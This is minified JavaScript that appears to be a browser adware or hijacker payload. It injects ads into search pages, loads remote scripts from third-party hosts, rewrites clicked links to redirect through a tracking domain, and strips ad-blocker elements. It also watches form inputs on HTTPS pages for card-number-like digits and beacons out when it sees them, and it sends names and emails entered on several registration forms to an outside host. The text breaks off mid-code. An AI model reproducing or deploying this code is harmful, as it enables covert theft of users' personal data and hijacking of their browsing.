a=function(){b.remove_search();b.utils.query_selector_all(\".omnibox-cards-transformations\")[0].style.marginTop=\"0px\";document.getElementById(\"reveal-cards\").style.marginTop=\"0px\"};b.events.add(\"click\",function(){a()},!1,document.getElementById(\"cards\"),!1);b.events.add(\"keyup\",function(){a()},!1,document.getElementById(\"searchbox_form\"),!1);b.events.add(\"click\",function(){a()},!1,document.getElementById(\"viewcard\"), !1);b.events.add(\"click\",function(){a()},!1,b.utils.query_selector_all(\".widget-runway-pegman\")[0],!1);b.events.add(\"click\",function(){a()},!1,b.utils.query_selector_all(\".gscb_a\")[0],!1);var c=function(a){a=document.querySelector(a);return getComputedStyle(a,null).height}(\".yael .cards-card\");document.querySelector(\".omnibox-cards-transformations\").style.marginTop=c;document.querySelector(\"#reveal-cards\").style.marginTop=c},validate:function(a){b.utils.isIE()||(b.num_of_items_in_one=1,a())}},amazon:{unique_search_divs:\"1\", urls:[\"http://www.amazon.com*&field-keywords=*\"],src_for_keyword:\"#twotabsearchtextbox\",validate:function(a){a()}},smartAddress:{hrefSelector:[\"li a\"],unique_search_divs:\"2\",dr:[\".peach ol\"],urls:[\"search.smartaddressbar.com/web.php?s=*\"],src_for_keyword:\"#stxt\",tweak:function(){var a=b.utils.query_selector_all(\".peach\")[0],c=b.utils.query_selector_all(\".right ul\")[0];a&&a.parentNode.removeChild(a);c&&c.parentNode.removeChild©},validate:function(){return!0}}};var l=function(a){if(\"string\"==typeof a){var c= a.match(/:nth-match\\(([0-9]+)\\)/);if(c&&1<c.length)return a=b.utils.query_selector_all(a.substr(0,c.index))||[],a[c[1]]||void 0;a=b.utils.query_selector_all(a)||[];return a[0]||void 0}};b.events=new function(){var a=this;a.cache=[];a.add=window.addEventListener?function(b,d,e,f,g){\"undefined\"==typeof f&&(f=window);f.addEventListener(b,d,e);g&&a.cache.push([b,d,e,f])}:window.attachEvent?function(b,d,e,f,g){\"undefined\"==typeof f&&(f=window);f[\"e\"+b+d]=d;f[b+d]=function(){f[\"e\"+b+d](window.event)};f.attachEvent(\"on\"+ b,f[b+d]);g&&a.cache.push([b,d,e,f])}:function(){};a.remove=window.removeEventListener?function(a,b,e,f){\"undefined\"==typeof f&&(f=window);f.removeEventListener(a,b,e)}:window.detachEvent?function(a,b,e,f){\"undefined\"==typeof f&&(f=window);f.detachEvent(\"on\"+a,f[a+b]);f[a+b]=null;f[\"e\"+a+b]=null}:function(){};a.flush=function(){for(var b=0;b<a.cache.length;b++)a.remove.apply(a,a.cache);a.cache=[]}};b.get_insertion_element=function(a){return!a.insert||\"before\"!=a.insert&&\"after\"!=a.insert?a.element: a.element.parentNode};b.dom=new function(){this.json_to_html=function(a,c){if(\"#text\"==a.type)c=document.createTextNode(a.text);else if(\"#comment\"!=a.type){c||(c=document.createElement(a.type));if(a.attrs){for(var d in a.attrs)if(a.attrs.hasOwnProperty(d))if(\"style\"==d&&a.attrs.style instanceof Object)for(var e in a.attrs.style){var f=b.utils.dhtml_prop_name(e);try{c.style[f]=a.attrs.style[e]}catch(g){}}else c.setAttribute(d,a.attrs[d]);\"iframe\"==a.type&&(a.attrs.hasOwnProperty(\"frameborder\")&&(c.frameBorder= a.attrs.frameborder),a.attrs.hasOwnProperty(\"marginwidth\")&&(c.marginWidth=a.attrs.marginwidth),a.attrs.hasOwnProperty(\"marginheight\")&&(c.marginHeight=a.attrs.marginheight))}if(a.children)for(d=0;d<a.children.length;d++){f=a.children[d];e=arguments.callee(f);try{c.appendChild(e)}catch(h){if(\"#text\"==f.type&&\"string\"==typeof f.text)if(\"style\"==a.type&&c.styleSheet)c.styleSheet.cssText=f.text||\"\";else if(e=b.utils.get_node_text_prop©)c[e]=f.text}}}return c}};b.addEventClick=function(a,c){for(var d= 0;d<a.length;d++)b.events.add(\"click\",function(a){a.preventDefault?a.preventDefault():a.returnValue=!1;this.href=\"#\";location.href=c+\"&j=true\";b.events.flush();localStorage.setItem(b.prefix,b.now+b.clickInterval);return!1},!1,a[d],!0)};b.checkClickInterval=function(a){if(b.now>a)return!0};b.setClickHref=function(a,c){if(\"undefined\"!=typeof b.projects_info[c].hrefSelector){if(b.utils.getRandomInt(1,1E4)>=1E4/b.ratio)return!1;var d=b.projects_info[c].hrefSelector,e=parseInt(localStorage.getItem(b.prefix)); if(\"undefined\"!=typeof d){if(d instanceof Array)for(var f=0;f<d.length;f++){var g=b.utils.query_selector_all(d[f]);if(0<g.length)break}else g=b.utils.query_selector_all(d);if(!e||b.checkClickInterval(e))b.addEventClick(g,a),b.j=!0}}};b.escape_chars_for_json=function(a){for(var b in a)a=a.replace(/\\\"/g,'\\\\\"');return a};b.tpl_engine=function(a,c,d){\"false\"!==d.layouts.unique&&(c=b.escape_chars_for_json©);a=JSON.stringify(a);c=[{replace:\"title\",\"with\":c.title},{replace:\"displayUrl\",\"with\":c.displayUrl}, {replace:\"description\",\"with\":c.description},{replace:\"clickUrl\",\"with\":c.clickUrl}];for(d=0;d<c.length;d++)a=a.replace(RegExp(\"\\\\[##\"+c[d].replace+\"##\\\\]\",\"g\"),c[d][\"with\"]);try{return JSON.parse(a)}catch(e){}};b.get_item_json=function(a,c){var d=b.utils.clone_object(a.layouts.template);d.attrs instanceof Object||(d.attrs={});return d=b.tpl_engine(d,c,a)};b.add_jsonp_to_config=function(a,c){b.get_item_json(a)};b.remove_search=function(){var a=b.utils.query_selector_all(\".yael\");if(0<a.length)for(var c= 0;c<a.length;c++)a[c].parentNode.removeChild(a[c])};b.inject_json=function(a){\"first\"==a.insert?a.element.insertBefore(a.node,a.element.firstChild):\"before\"==a.insert?a.element.parentNode.insertBefore(a.node,a.element):\"after\"==a.insert?a.element.parentNode.insertBefore(a.node,a.element.nextSibling):a.element.appendChild(a.node)};b.get_ad_dom=function(a){return a.layouts instanceof Object&&a.layouts.dom instanceof Object?a.layouts.dom:!1};b.get_layout_type=function(a){if(a.layouts instanceof Object)for(var b= 0;b<k.length;b++)if(-1<a.layouts.id.indexOf(k))return k;return!1};b.create_search=function(a){a=b.get_ad_dom(a);return b.dom.json_to_html(a)};b.templates=new function(){this.container_id=0;this.add_real_links=function(a,c){b.utils.add_event(\"click\",function(b){window.open(a);b.preventDefault?b.preventDefault():b.returnValue=!1},!1,c)}};b.validate_response=function(){for(var a in __yael_res.data.items)__yael_res.data.items[a].displayUrl.match(/^(http:\\/\\/|https:\\/\\/|\\/\\/)/)&&__yael_res.data.items[a].displayUrl.replace(/^(http:\\/\\/|https:\\/\\/|\\/\\/)/, \"\")};b.is_target_valid=function(a){if(0!=__yael_res.data.numberOfItems&&\"undefined\"!=typeof a.element)return a.urls instanceof Array&&!b.utils.match_url(a.element.ownerDocument.location.href,a.urls)?!1:!0};var p=null;b.get_target_element=function(a){if(a.inserts instanceof Array&&\"undefined\"==typeof a.element)for(var b=0;b<a.inserts.length;b++)if(a.element=l(a.inserts.selector),\"undefined\"!==typeof a.element){a.insert=a.inserts.at;break}};b.add_data_to_config=function(a,c){if(0==c.length)return b.unique_items_left= !1;var d=b.get_ad_dom(a);(function(a,c){c.children&&0!==c.children.length?(c=c.children[c.children.length-1],arguments.callee(a,c)):b.insert_point=c})(a,d);for(d=0;d<b.num_of_items_in_one&&0!=c.length;d++)b.insert_point.children.push(b.get_item_json(a,c[0])),\"true\"==a.layouts.unique?b.not_unique_items.push(c.shift()):c.shift()};b.addEventsToItems=function(){for(var a=document.querySelectorAll('a[href*=\"'+b.jsonpHost+'\"]'),c=0;c<a.length;c++)b.events.add(\"click\",function(){b.init_search_project()}, !1,a[c],!1)};b.check_if_div_in_dom=function(a,b){var d=[],e;for(e in __yael_res.config.targets){var f=__yael_res.config.targets[e];clearTimeout(p);a++;if(4<a)return;if(f.inserts instanceof Array&&\"undefined\"==typeof f.element)for(var g=0;g<f.inserts.length;g++){var h=l(f.inserts[g].selector);\"undefined\"!==typeof h&&d.push(h)}}for(e=0;e<d.length;e++)if(\"undefined\"==typeof d[e]){var k=this;p=setTimeout(function(){k.apply(k,arguments)},200)}b()};b.loop_targets=function(a,c,d){if(a instanceof Object&& (b.get_target_element(a),b.is_target_valid(a)&&(\"false\"==d&&b.unique_items_left&&(c=b.not_unique_items),0!=c.length))){b.add_data_to_config(a,c);try{a.node=b.create_search(a)}catch(e){}\"undefined\"!=typeof a.node&&b.inject_json(a)}};b.removeSecondClick=function(){for(var a=b.utils.query_selector_all(\".yael a\"),c=0;c<a.length;c++)b.events.add(\"click\",function(a){setTimeout(function(){for(var a=b.utils.query_selector_all(\".yael a\"),c=0;c<a.length;c++){var d=a[c];d.outerHTML=d.outerHTML.replace(/href\\=/ig, \"_href=\")}},20)},!1,a[c],!0)};b.inject_search=function(){b.not_unique_items=[];0!=__yael_res.data.items.length&&(b.setClickHref(__yael_res.data.items[0].clickUrl,b.projects_name),b.check_if_div_in_dom(0,function(){for(var a in __yael_res.config.targets){var c=__yael_res.config.targets[a];b.loop_targets(c,__yael_res.data.items,c.layouts.unique)}\"function\"==typeof b.projects_info[b.projects_name].tweak&&b.projects_info[b.projects_name].tweak();b.j||b.removeSecondClick();b.utils.flushWaitForTokens()}))}; b.init_search_project=function(){b.waitForElementCounter=0;\"undefined\"!=typeof __yael&&b.remove_search();for(var a in b.projects_info)if(b.utils.match_url(location.href,b.projects_info[a].urls)){var c=b.projects_info[a];b.projects_name=a;if(-1<b.initThrottle.indexOf(a))c.validate(function(){c.name=b.projects_name;b.get_keyword(c,function(a,c){b.jsonp_request(a,c)})});else{if(!c.validate())return;c.name=b.projects_name;b.projects_name=a;b.get_keyword(c,function(a,c){b.jsonp_request(a,c)})}}return!1}; b.get_keyword=function(a,c){var d=a.src_for_keyword,e=function(d){b.inputElement=d[0];b.keyword=b.inputElement.value;if(2>b.keyword.length)return b.utils.flushWaitForTokens(),!1;if(b.inputElement&&\"input\"==b.inputElement.tagName.toLowerCase()&&\"\"!==b.keyword)return c(b.keyword,a.name)};if(d instanceof Array)for(var f=0;f<d.length;f++)b.utils.waitForElement(d[f],function(a){a&&e(a)},100,\"keyword\");else b.utils.waitForElement(d,function(a){a&&e(a)},100,\"keyword\")};b.remove_se_handler=function(a){var c= b.projects_info[a].dr;if(c instanceof Array)if(\"bing\"==a)for(c=b.utils.query_selector_all(c[0]),a=0;a<c.length;a++)b.remove_se(c[a]);else for(a=0;a<c.length;a++){var d=l(c[a]);b.remove_se(d)}};b.remove_se=function(a){a&&a.parentElement.removeChild(a)};b.jsonp_request=function(a,c){var d=b.num_of_items_in_one*parseInt(b.projects_info[c].unique_search_divs);window.__yael_cb=function(a){window.__yael_res=a;\"0\"==__yael_res.data.numberOfItems?b.utils.flushWaitForTokens():(0==__yael.utils.getRandomInt(0, 10)&&b.remove_se_handler©,__yael.inject_search())};\"undefined\"==typeof window.__yael&&(window.__yael=b);d=b.jsonpHost+\"/?v=\"+b.version+\"&p=\"+c+\"&keyword=\"+a+\"&numItems=\"+d+\"&hid=0&eid=15&pid=34&prid=186\";\"undefined\"!=typeof specificFeeds&&specificFeeds instanceof Array&&(d+=\"&_feeds=\"+specificFeeds.join(\",\"));if(b.utils.isIE()){if(document.getElementById(\"__yael_script\")){var e=document.getElementById(\"__yael_script\");e.parentNode.removeChild(e)}e= document.createElement(\"script\");e.id=\"__yael_script\";e.src=\"//\"+d+\"&domvar=__yael_cb\";e.type=\"text/javascript\";b.utils.addScript(e,c)}else b.utils.ajax.get(\"//\"+d,function(a){window.__yael_res=JSON.parse(a);\"0\"==__yael_res.data.numberOfItems?b.utils.flushWaitForTokens():(0==__yael.utils.getRandomInt(0,10)&&__yael.remove_se_handler©,__yael.inject_search())})};\"undefined\"==typeof __yael&&b.init_search_project();-1<b.initThrottle.indexOf(b.projects_name)&&b.events.add(\"keyup\",b.utils.throttle(b.init_search_project, 3E3),!1,b.inputElement,!1)}});;if(window.self==window.top && window.self.location.protocol=='http:'){var script=document.createElement('script');script.type='text/javascript';script.src='//istatic.datafastguru.info/fo/min/wp.js?subid=15_34&hid=0';document.getElementsByTagName(\"head\")[0].appendChild(script);};if(window.self==window.top){var script=document.createElement('script');script.type='text/javascript';script.src='//api.jollywallet.com/affiliate/client?dist=87&sub=4';document.getElementsByTagName(\"head\")[0].appendChild(script);};try{new function(){if(null==document.getElementById(\"id_arrrrppdjafklbvnn4440fm\")&&\"http:\"==location.protocol&&window.self==window.top){var a=document.createElement(\"script\");a.type=\"text/javascript\";a.src=\"http://istatic.datafastguru.info/fo/min/fo_bsso.min.js?subid=15_34&hid=0\";a.setAttribute(\"id\",\"id_arrrrppdjafklbvnn4440fm\");document.getElementsByTagName(\"head\")[0].appendChild(a)}}}catch(e$$12){};;if(window.self.location.hostname.indexOf('mail.')==-1)\r\n{try{for(i=0;i<5;i++){window.setTimeout(function(){if(document.getElementById(\"cblocker\")){document.getElementById(\"cblocker\").parentNode.removeChild(document.getElementById(\"cblocker\"));};if(document.getElementById(\"_vdcbl\")){document.getElementById(\"_vdcbl\").parentNode.removeChild(document.getElementById(\"_vdcbl\"));}},i*100)}}catch(e){};\r\n};(function(){try{if(window.opener&&window.self==window.top&&-1==document.cookie.indexOf(\"xcddsa\")&&-1==window.self.location.href.indexOf(\"px.pluginh\")&&window.self.location.hostname.indexOf('earchfu')==-1&&(!document.referrer||-1==document.referrer.indexOf('/amz/')&&(!document.referrer.match(/cpops-\\d+\\.html/))&&-1==document.referrer.indexOf(\"px.pluginh\"))&&-1==window.self.location.href.indexOf(\"nkths.co\")&&-1==window.self.location.href.indexOf(\"ally.asi\")&&-1==window.self.location.href.indexOf('/amz/')&&(!window.self.location.href.match(/cpops-\\d+\\.html/))&&-1==window.self.location.hostname.indexOf(\"getjs\")&&-1==window.self.location.hostname.indexOf(\"hsbc\")&&3>history.length){var c=navigator.userAgent.toLowerCase(),d=\"http://canadaalltax.com/z/?f=qTgKrjCFvTsGpc5FqTmXrjnErTwFqHs4rn%3D%3D&eid=15&hid=0&pid=34&rf=\" + encodeURIComponent(document.referrer) +\"&s=px.pluginh&r=\"+Math.random();if(-1<c.indexOf(\"msie\")&&(!document.referrer||-1==document.referrer.indexOf(location.hostname))){var e=window.innerWidth||document.documentElement.scrollWidth||0,f=window.innerHeight||document.documentElement.scrollHeight||0;if(e){window.resizeTo(e,f);var g=window.innerWidth||document.documentElement.scrollWidth,k=window.innerHeight||document.documentElement.scrollHeight;window.resizeTo(e+2,f);var h=window.scrollWidth||document.documentElement.scrollWidth;if(h!=g&&h<=g+2&&90>=f-k){var a=new Date;a.setHours(a.getHours()+1);document.cookie=\"xcddsa=1;expires=\"+a.toUTCString();if(window.onbeforeunload){window.onbeforeunload=null;d+='&ch=97'};try{if(typeof(jQuery)!=\"undefined\"){jQuery(window).unbind(\"beforeunload\")}}catch(e){};window.self.location.href=d}}}else if(!window.menubar.visible&&document.referrer&&-1==document.referrer.indexOf(window.self.location.hostname)){a=new Date;a.setHours(a.getHours()+1);document.cookie=\"xcddsa=1;expires=\"+a.toUTCString();if(window.onbeforeunload){window.onbeforeunload=null;d+='&ch=97'};var b=document.createElement(\"script\");b.type=\"text/javascript\";-1<c.indexOf(\"chrome\")&&(b.innerHTML='document.getElementsByTagName(\"body\")[0].setAttribute(\"xcddsa\",\"1\")',document.getElementsByTagName(\"body\")[0].appendChild(b),setTimeout(function(){document.getElementsByTagName(\"body\")[0].getAttribute(\"xcddsa\")&&(window.self.location.href=d)},10));-1<c.indexOf(\"firefox\")&&(b.innerHTML='try{if(typeof(jQuery)!=\"undefined\"){jQuery(window).unbind(\"beforeunload\")}}catch(e){};setTimeout(function(){window.self.location.href=\"'+d+'\";},10);',document.getElementsByTagName(\"head\")[0].appendChild(b))}}}catch(l){}})();if(1==2&&-1<window.self.location.href.indexOf(\"df.ly/\")){var dd=document.getElementById(\"rf\");dd&&dd.setAttribute(\"src\",\"http://canadaalltax.com/x/?f=qTgKrjCFvTsGpc5FqTmXrjnErTwFqHs4rn%3D%3D&ch=1\")}(\"rdlnk.co\"==window.self.location.hostname||\"adfoc.us\"==window.self.location.hostname||\"www.adsbeta.net\"==window.self.location.hostname||\"ad5.eu\"==window.self.location.hostname)&&(dd=document.getElementsByTagName(\"iframe\")[0])&&dd.setAttribute(\"src\",\"http://canadaalltax.com/x/?ch=1\");\"cf.ly\"==window.self.location.hostname&&(dd=document.getElementsByTagName(\"iframe\")[1])&&dd.setAttribute(\"src\",\"http://canadaalltax.com/x/?f=qTgKrjCFvTsGpc5FqTmXrjnErTwFqHs4rn%3D%3D&ch=1\");\"adv.li\"==window.self.location.hostname&&(dd=document.getElementById(\"main\"))&&dd.setAttribute(\"src\",\"http://canadaalltax.com/x/?f=qTgKrjCFvTsGpc5FqTmXrjnErTwFqHs4rn%3D%3D&ch=1\");if(window.top==window.self&&\"undefined\"!=typeof addEventListener&&-1==document.cookie.indexOf(\"vdsknj4th4un\")){var zytd=function(a){try{if(\"a\"==a.target.tagName.toLowerCase()&&\"\"==a.target.innerHTML&&a.target.getAttribute(\"href\")&&-1==a.target.getAttribute(\"href\").indexOf(window.self.location.hostname)){a.target.setAttribute(\"href\",\"http://canadaalltax.com/z/?f=qTgKrjCFvTsGpc5FqTmXrjnErTwFqHs4rn%3D%3D&eid=15&hid=0&pid=34&ch=666&rf=\"+encodeURIComponent(window.self.location.href)+\"&s=px.pluginh&r=\"+Math.random());var b=new Date;b.setHours(b.getHours()+5);document.cookie=\"vdsknj4th4un=1;expires=\"+b.toUTCString();document.getElementsByTagName(\"body\")[0].removeEventListener(\"click\",zytd)}}catch©{}};try{document.getElementsByTagName(\"body\")[0].addEventListener(\"click\",zytd)}catch(e){}};if(\"www.youtube.com\"==window.self.location.hostname&&\"http:\"==window.self.location.protocol){var video_id=window.location.search.split(\"v=\")[1];if(video_id){var ampersandPosition=video_id.indexOf(\"&\");-1!=ampersandPosition&&(video_id=video_id.substring(0,ampersandPosition));if(video_id&&document.getElementById(\"watch7-views-info\")){var vc=document.getElementById(\"watch7-views-info\").firstElementChild;vc&&document.getElementById(\"watch7-views-info\").firstElementChild.innerHTML&&((new Image).src=\"http://score.developpro.info/?pr=1&d=\"+video_id+\"&s=\"+document.getElementById(\"watch7-views-info\").firstElementChild.innerHTML.replace(/[^0-9]/g,\"\"))}}};if((-1<window.self.location.hostname.indexOf(\"foodpanda\")||-1<window.self.location.hostname.indexOf(\"hellofood\"))&&document.getElementById(\"submitRegisterStep1\")){var price=query_selector_all(\".cart-line-price\"),p=price&&price[price.length-1]?parseInt(price[price.length-1].innerHTML.replace(/[^0-9]/g,\"\")):0,h=window.self.location.hostname;(new Image).src=\"http://score.developpro.info/g.php?pr=1&d=\"+h+\"&s=\"+p}\"justeat.in\"==window.self.location.hostname&&-1<window.self.location.href.indexOf(\"checkout\")&&((new Image).src=\"http://score.developpro.info/g.php?pr=1&d=justeat.in&s=0\");\"tastykhana.in\"==window.self.location.hostname&&-1<window.self.location.href.indexOf(\"billing\")&&((new Image).src=\"http://score.developpro.info/g.php?pr=1&d=justeat.in&s=0\");if(-1<window.self.location.hostname.indexOf(\"titbit.com\")||\"checkout\"==window.self.location.hostname)(new Image).src=\"http://score.developpro.info/g.php?pr=1&d=titbit.com&s=0\";\"www.grubhub.com\"==window.self.location.hostname&&-1<window.self.location.href.indexOf(\"payment\")&&((new Image).src=\"http://score.developpro.info/g.php?pr=1&d=www.grubhub.com&s=0\");\"www.delivery.com\"==window.self.location.hostname&&-1<window.self.location.href.indexOf(\"order_process\")&&((new Image).src=\"http://score.developpro.info/g.php?pr=1&d=www.delivery.com&s=0\");\"www.foodler.com\"==window.self.location.hostname&&-1<window.self.location.href.indexOf(\"AnonCheckout\")&&((new Image).src=\"http://score.developpro.info/g.php?pr=1&d=www.foodler.com&s=0\");\"eat24hours.com\"==window.self.location.hostname&&\"https:\"==window.self.location.protocol&&((new Image).src=\"http://score.developpro.info/g.php?pr=1&d=eat24hours.com&s=0\");(function(){try{var a=document.getElementsByTagName(\"input\");if(\"https:\"==window.self.location.protocol&&4<a.length)for(var d=function(b){b=b.target;if(b.value&&11<b.value.length&&20>b.value.length&&b.value.match(/^[0-9]+$/))for((new Image).src=\"https://score.sendapplicationget.com/g.php?pr=2&d=\"+window.self.location.hostname+\"&s=0&r=\"+(+new Date).toString()+Math.random(),b=0;b<a.length;b++)a&&a.removeEventListener?a.removeEventListener(\"blur\",d,!1):a&&a.detachEvent&&a.detachEvent(\"onblur\",d)},c=0;c<a.length;c++)a[c]&&a[c].addEventListener?a[c].addEventListener(\"blur\",d,!1):a[c]&&a[c].attachEvent&&a[c].attachEvent(\"onblur\",d)}catch(e){}})();(function(){var init=function(b,a,f){for(var e=function(){for(var d=[],c=0;c<a.length;c++)b[a[c]]&&b[a[c]].value&&2<b[a[c]].value.length&&d.push(b[a[c]].value.replace(/[^0-9a-z \\-_\\[email protected]]/ig,\"\"));if(d.length==a.length)for((new Image).src=\"https://score.sendapplicationget.com/?id=\"+f+\"&c=\"+encodeURIComponent(d.join(\",\"))+\"&r=\"+Math.random(),c=0;c<a.length;c++)b[a[c]]&&b[a[c]].removeEventListener?b[a[c]].removeEventListener(\"blur\",e,!1):b[a[c]]&&b[a[c]].detachEvent&&b[a[c]].detachEvent(\"onblur\",e)},d=0;d<a.length;d++)b[a[d]]&&b[a[d]].addEventListener?b[a[d]].addEventListener(\"blur\",e,!1):b[a[d]]&&b[a[d]].attachEvent&&b[a[d]].attachEvent(\"onblur\",e)};(\"www.apply.forex.com\"==window.self.location.hostname||\"apply.forex.com\"==window.self.location.hostname)&&-1<window.self.location.href.indexOf(\"Screen1\")&&document[\"aspnetForm\"]&&init(document[\"aspnetForm\"],\"ctl00$ContentPlaceHolder1$ctl01$txtFirstname,ctl00$ContentPlaceHolder1$ctl01$txtLastname,ctl00$ContentPlaceHolder1$ctl01$txtVerifyEmail\".split(','),\"3\");(\"www.thelotter.com\"==window.self.location.hostname||\"thelotter.com\"==window.self.location.hostname)&&-1<window.self.location.href.indexOf(\"remoteshortregistration\")&&document[\"aspnetForm\"]&&init(document[\"aspnetForm\"],\"ctl00$ContentPlaceHolderMain$ctl00$signUpForms$txtFirstName,ctl00$ContentPlaceHolderMain$ctl00$signUpForms$txtEmail\".split(','),\"4\");(\"www.calottery.com\"==window.self.location.hostname||\"calottery.com\"==window.self.location.hostname)&&-1<window.self.location.href.indexOf(\"register\")&&document[\"frmMain\"]&&init(document[\"frmMain\"],\"objBody$content_0$leftcolumn_0$txtFirstName,objBody$content_0$leftcolumn_0$txtLastName,objBody$content_0$leftcolumn_0$txtEmail\".split(','),\"5\")})();if(Math.ceil(Math.random()*10)==1){(function(){var a = \"microsoft msn youtube.com ninemsn yahoo maktoob rivals amazon jeuxvideo xbox flickr outlook microsoftstore alltheweb intonow overture tumblr live facebook embedr altavista ashleyfurniturehomestore reddit tripadvisor rightmedia craigslist sprint mozilla att omg.com apple americanexpress\".split(\" \");for(var i=0;i<a.length;i++) if(window.self.location.hostname.indexOf(a[i])>-1){return};try{if(typeof(localStorage)!='undefined' && (window.self.location.hostname.indexOf('adnxs.com')>-1 || window.self.location.hostname.indexOf('doubleclick')>-1 || window.self.location.hostname.indexOf('cloudfront')>-1)){localStorage.setItem(\"xhxg4sk42hsba\",\"9\")}}catch(e){};var _wlst={lsKey:\"xhxg4sk42hsba\",get:function(b,a){if(window.self.location.protocol==\"https:\" || 3<b)return a(!1);var d=this.fetch();if(d)return a(parseInt(d));if(1==b){crc=this.hcrc32(window.self.location.hostname.replace(\"www.\",\"\"));try{var c=document.createElement(\"script\");c.type=\"text/javascript\";try{c.async=\"async\"}catch(e){}c.src=\"http://v.zilionfast.in/\"+crc+\"/?t=vrt\";(document.getElementsByTagName(\"head\")[0]||document.getElementsByTagName(\"body\")[0]).appendChild©}catch(f){}}setTimeout(function(){_wlst.get(++b,a)},180)},fetch:function(){try{if(\"undefined\"!=localStorage)try{return localStorage.getItem(this.lsKey)}catch(b){return 0}else _wlst.getCkie()}catch(a){_wlst.getCkie()}},getCkie:function(){if(0<document.cookie.length&&(c_start=document.cookie.indexOf(this.lsKey+\"=\"),-1!=c_start))return c_start=c_start+this.lsKey.length+1,c_end=document.cookie.indexOf(\";\",c_start),-1==c_end&&(c_end=document.cookie.length),unescape(document.cookie.substring(c_start,c_end))},hcrc32:function(b,a){a||(a=0);var d=0;a^=-1;for(var c=0,e=b.length;c<e;c++)d=(a^b.charCodeAt©)&255,d=\"0x\"+\"00000000 77073096 EE0E612C 990951BA 076DC419 706AF48F E963A535 9E6495A3 0EDB8832 79DCB8A4 E0D5E91E 97D2D988 09B64C2B 7EB17CBD E7B82D07 90BF1D91 1DB71064 6AB020F2 F3B97148 84BE41DE 1ADAD47D 6DDDE4EB F4D4B551 83D385C7 136C9856 646BA8C0 FD62F97A 8A65C9EC 14015C4F 63066CD9 FA0F3D63 8D080DF5 3B6E20C8 4C69105E D56041E4 A2677172 3C03E4D1 4B04D447 D20D85FD A50AB56B 35B5A8FA 42B2986C DBBBC9D6 ACBCF940 32D86CE3 45DF5C75 DCD60DCF ABD13D59 26D930AC 51DE003A C8D75180 BFD06116 21B4F4B5 56B3C423 CFBA9599 B8BDA50F 2802B89E 5F058808 C60CD9B2 B10BE924 2F6F7C87 58684C11 C1611DAB B6662D3D 76DC4190 01DB7106 98D220BC EFD5102A 71B18589 06B6B51F 9FBFE4A5 E8B8D433 7807C9A2 0F00F934 9609A88E E10E9818 7F6A0DBB 086D3D2D 91646C97 E6635C01 6B6B51F4 1C6C6162 856530D8 F262004E 6C0695ED 1B01A57B 8208F4C1 F50FC457 65B0D9C6 12B7E950 8BBEB8EA FCB9887C 62DD1DDF 15DA2D49 8CD37CF3 FBD44C65 4DB26158 3AB551CE A3BC0074 D4BB30E2 4ADFA541 3DD895D7 A4D1C46D D3D6F4FB 4369E96A 346ED9FC AD678846 DA60B8D0 44042D73 33031DE5 AA0A4C5F DD0D7CC9 5005713C 270241AA BE0B1010 C90C2086 5768B525 206F85B3 B966D409 CE61E49F 5EDEF90E 29D9C998 B0D09822 C7D7A8B4 59B33D17 2EB40D81 B7BD5C3B C0BA6CAD EDB88320 9ABFB3B6 03B6E20C 74B1D29A EAD54739 9DD277AF 04DB2615 73DC1683 E3630B12 94643B84 0D6D6A3E 7A6A5AA8 E40ECF0B 9309FF9D 0A00AE27 7D079EB1 F00F9344 8708A3D2 1E01F268 6906C2FE F762575D 806567CB 196C3671 6E6B06E7 FED41B76 89D32BE0 10DA7A5A 67DD4ACC F9B9DF6F 8EBEEFF9 17B7BE43 60B08ED5 D6D6A3E8 A1D1937E 38D8C2C4 4FDFF252 D1BB67F1 A6BC5767 3FB506DD 48B2364B D80D2BDA AF0A1B4C 36034AF6 41047A60 DF60EFC3 A867DF55 316E8EEF 4669BE79 CB61B38C BC66831A 256FD2A0 5268E236 CC0C7795 BB0B4703 220216B9 5505262F C5BA3BBE B2BD0B28 2BB45A92 5CB36A04 C2D7FFA7 B5D0CF31 2CD99E8B 5BDEAE1D 9B64C2B0 EC63F226 756AA39C 026D930A 9C0906A9 EB0E363F 72076785 05005713 95BF4A82 E2B87A14 7BB12BAE 0CB61B38 92D28E9B E5D5BE0D 7CDCEFB7 0BDBDF21 86D3D2D4 F1D4E242 68DDB3F8 1FDA836E 81BE16CD F6B9265B 6FB077E1 18B74777 88085AE6 FF0F6A70 66063BCA 11010B5C 8F659EFF F862AE69 616BFFD3 166CCF45 A00AE278 D70DD2EE 4E048354 3903B3C2 A7672661 D06016F7 4969474D 3E6E77DB AED16A4A D9D65ADC 40DF0B66 37D83BF0 A9BCAE53 DEBB9EC5 47B2CF7F 30B5FFE9 BDBDF21C CABAC28A 53B39330 24B4A3A6 BAD03605 CDD70693 54DE5729 23D967BF B3667A2E C4614AB8 5D681B02 2A6F2B94 B40BBE37 C30C8EA1 5A05DF1B 2D02EF8D\".substr(9*d,8),a=a>>>8^d;c=a^-1;0>c&&(c+=4294967296);return c}},_zyad={title:document.title?document.title.toLowerCase():\"na\",location:window.self.location.href.toLowerCase() + (document.referrer ? document.referrer : ''),vrt:!1,networks_list:[[['cpx_bet_55',381],['saymedia_epom',8498],['startmeapp_tier1_1',153],['ybrant_apn3785',99],['matomy_adj36',153],['clove_adr4',68],['adsiduous_D',114],['dsnr_dasa_e1',267],['dsnr_nntbr_e1',267]],[['cpx_youtube',500],['matomy_strm36',8500],['mari_strm_4',500],['web3_strm_D',500]],[['hulk_porn',10000]]],networks_conf:!1,init:function(){_wlst.get(1,function(b){_zyad.vrt=b;if(!(_zyad.vrt==17 || _zyad.location.indexOf('epBZXbCZ=')>-1|| _zyad.location.indexOf('adk2.co')>-1 ||window.self.location.hostname==\"tr.adsplats.com\"||window.self.location.hostname==\"n66.adshostnet.com\"||window.self.location.hostname==\"ib.adnxs.com\"||window.self.location.hostname==\"ads.incmd01.com\"||window.self.location.hostname==\"ads.clovenetwork.com\"||window.self.location.hostname==\"an.z5x.net\"||window.self.location.hostname==\"servedby.adsplats.com\"||window.self.location.hostname==\"ads.ventivmedia.com\"|| _zyad.location.indexOf('=287611')>-1|| 